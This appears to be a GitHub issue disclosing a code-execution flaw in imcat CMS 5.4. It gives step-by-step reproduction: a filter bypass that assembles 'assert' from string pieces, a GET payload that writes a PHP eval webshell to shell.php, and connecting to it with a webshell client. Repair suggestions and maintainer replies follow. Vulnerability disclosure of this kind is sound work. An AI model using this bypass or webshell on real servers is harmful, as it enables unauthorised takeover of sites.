Open haungtongfu opened 3 years ago
As you said: "Perfect the rules of detection (this is hard to implement)": Good!, These code run before the filter code, And in the DIY mode, You can remove the filter code too!
But, You can use master branch
!
It was disabled by default at in master branch
.
Sorry! The DIY-mode, It was disabled by default only at master branch. In v5.4, this feature was not update.
I suggest that DIY be disabled by default. Good luck
Can this vulnerability help me apply for a CVE? thank you! Requesting a CVE identification number-GitHub Docs
Thinks.
1. Overview
Official website: http://txjia.com/imcat/
Version: imcat-5.4
Vulnerability type: Code Execution
Source code: https://github.com/peacexie/imcat/releases/tag/v5.4
PS: it is recommended to use php7.0.12 environment. Other environments will have different problems when loopholes recur
2. Source code analysis
In the background of the CMS, an online source code editing function is provided, and then dangerous functions are filtered through the file imcat-5.4, imcat, core, glib and safscan.php. However, due to the incomplete filtering rules of the filtering function, dangerous code can be written and executed, forming a loophole in code execution, The attacker can gain the permission of the server through this vulnerability
3. Reappearance
Use phpstudy to build the environment, and then log in to the background of the website
(1) Select tool - DIY configuration - select any file to modify. I choose index. PHP here
(2) Try to write a sentence Then save it and find an error, because the filter rule in imcat-5.4, imcat, core, glib, safscan.php file is triggered
(3) Try to write $ch = explode(".","hello.ass.world.er.t"); $c = $ch[1].$ch[3].$ch[4]; //assert $d=$_GET['x']; $c($d); Successfully bypassed
(4) Visit http://127.0.0.1/imcat/index.php?x= fputs(fopen('shell.php','w'),'<?php @eval($POST[a])?>') This statement means to create a shell.php file in the same directory as index.php and write a sentence "Trojan horse <? php @eval($ POST[a])?> Although the page is wrong in reality, the statement has been executed successfully and shell.php has been generated in the same directory
(5) Use ant sword to connect
http://127.0.0.1/imcat/shell.php
4. Repair service suggestions
(1) Turn off the function of modifying the source code in the background
(2) Perfect the rules of detection (this is hard to implement)